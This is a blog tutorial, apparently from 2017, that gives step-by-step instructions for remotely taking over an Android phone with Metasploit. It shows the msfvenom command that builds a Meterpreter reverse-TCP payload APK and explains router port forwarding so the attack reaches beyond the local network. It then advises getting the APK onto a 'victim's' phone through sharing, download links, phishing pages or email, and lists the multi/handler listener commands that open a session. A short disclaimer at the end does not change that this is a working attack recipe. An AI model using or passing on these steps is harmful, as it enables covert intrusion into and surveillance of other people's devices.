Hack Android Phone Remotely !!!

  • May 8th, 2017
  • Posted by: distroworld
  • Category: Android
...

Welcome back my dear Hackers.Lets learn to hack an android phone by using Kali Linux/Backtrack.

Before we start, lets get familiar with some terms which will be used during our hacking attempt.

Beginning with:

Metasploit =A tool for developing and executing exploit code against a remote target machine

Meterpretor=Dynamically extensible payload that uses in-memory DLL injection and is extended over the network at runtime.

Msfconsole=It provides an “all-in-one” Metasploit Framework console and allows you efficient access to virtually all of the options available in the MSF like the payloads.

 

Note : Words written under          // – – – – – – – – – -//  are only comments.Please don’t get confuse..

 

Requirements:
Software requirements= kali Linux or backtrack, Metasploit (build in kali/backtrack), universal serial bus tool, Rufus

 

Step 1:-
First of all, boot your kali or backtrack into the USB using tool universal serial bus or any other tool.Here I will use kali linux.
Boot your kali live and open terminal

 

Step 2:-

Type

– – – – – – – – – – – – – – – – – – – – – – – – — – – – – – – – – – – – – – – – – – – – – –

Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 R LPORT=4044 -o /var/droidhack.apk
– – – – – – – – – – – – – – – – – – – – – – – – — – – – – – – – – – – – – – – – – – – – –

 

Here, the words used represent the following meaning.

 

1.msfvenom = To create a payload

2. -p = specifying type of payload

3. Android = which Operating System or type of device

4. Meterpreter=Part of Metasploit helpful in creating extensible payload

5.reverse_tcp=we set up a listener first on our device, the target machine acts as a client connecting to it, and then finally we receive the shell(reverse_tcp)

6. LHOST=198.168.0.104

NOTE: Note this is my IP.It can be different in your case .You can check by typing ifconfig in Terminal.Moreover, remember that this attack is gonna work only on LAN.To play this attack over WAN ,You need to do Port Forwarding.

 

For WAN(Wide Area Network or globally) attacking: Do specify, the PUBLIC IP address provided by your ISP or you can check your Public IP at https://www.whatismyip.com/.Also, you need to do Port Forwarding.
Port Forwarding:
I have TP-LINK router, almost every router has the same interface. So considering TP-Link, We will learn Port Forwarding.
(a).First check your,gateway ip and private IP in Terminal by typing

– – – – – – – – – – – – – – – – – – – – – – – — – – – – – – – – – – – – – – – – –
ifconfig
– – – – – – – – – – – – – – – – – – – – – – – – — – – – – – – – – – – – – – – – –

Now copy your default gateway IP ,and paste In your Browser.Now you will be asked to enter password and username.
Enter default username = admin and password =admin
If you have changed the router password then enter your credentials.
Now see at left corner drop menu and click on forwarding and go to virtual servers.
set the following values:

 

Service Port= 4044                         // enter your port you want to use //

Internal port= 4044                       // same as above //

IP Address = 192.168.0.104       // your IP //

Protocol= set to ALL

Status= Enabled

Common Service Port =                 //leave it to default setting //

Save it and close the page in the browser.

7.LPORT=4044

8. -o =output location of file with name(droidhack.apk)

 

Hit enter.

Now u will see in terminal

– – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – –
No plateform was —————-            // Some this type of message//

– – – – – – – – – – –

– – – – – – – –
Payload size :100 bytes           // any no. of bytes

Saved as : – – – –
– – – – – – – – – – – – – – – – – – – – – – – – — – – – – – – – – – – – – – – – – – – – – – – – – – – – – –

After doing this,

Either simply place the droidhack.apk file to someone phone via sharing or by giving
Victim a link which will download this droidhack.apk file to his phone.
You can use the following website for creating a live link

http://wikisend.com/

Upload your Payload and get your link.Now redirect victim or mail link him in any form by phishing page or mailing respectively.

 

Step 3:- type

– – – – – – – – – – – – – – – – – – – – – – – – — – – – – – – – – – – – – – – – – – – — – –
Msfconsole
– – – – – – – – – – – – – – – – – – – – – – – – — – – – – – – – – — – – – – – – – – – – – – –

Now Metasploit framework will open.Type following Commands

– – – – – – – – – – – – – – – – – – – – – – – – — – – – – – – – – – – – – – – – – – – – –
Msf use multi/handler

Msf exploit(handler) set payload android/meterpreter/reverse_tcp  // here you must enter your ip address ,as you are a listener now.You want to fetch data from victim device.//

Msf exploit(handler) set LHOST 192.168.0.104

Msf exploit(handler) set LPORT 4044

Msf exploit(handler) exploit
– – – – – – – – – – – – – – – – – – – – – – – – — – – – – – – – – – – – – – – – – – – – – – – –
Now you machine is listening to victim,when the victim install the droidhack.apk file in his android phone ,you will find a session will be opened .
Now you can do what you want.

For help or command list

Type

– – – – – – – – – – – – – – – – – – – – – – – – — – – – – – – – – – – – – – – – – – – – – –

?
// or //

-h
– – – – – – – – – – – – – – – – – – – – – – – – — – – – – — – – – – – – – – – – – – –

So don’t just read ,Try hack and learn how this Works.

Don’t Use for  evil purpose.It is intended to make you guys learn .

Thanks for reading ,keep sharing.

Leave a Reply

Your email address will not be published. Required fields are marked *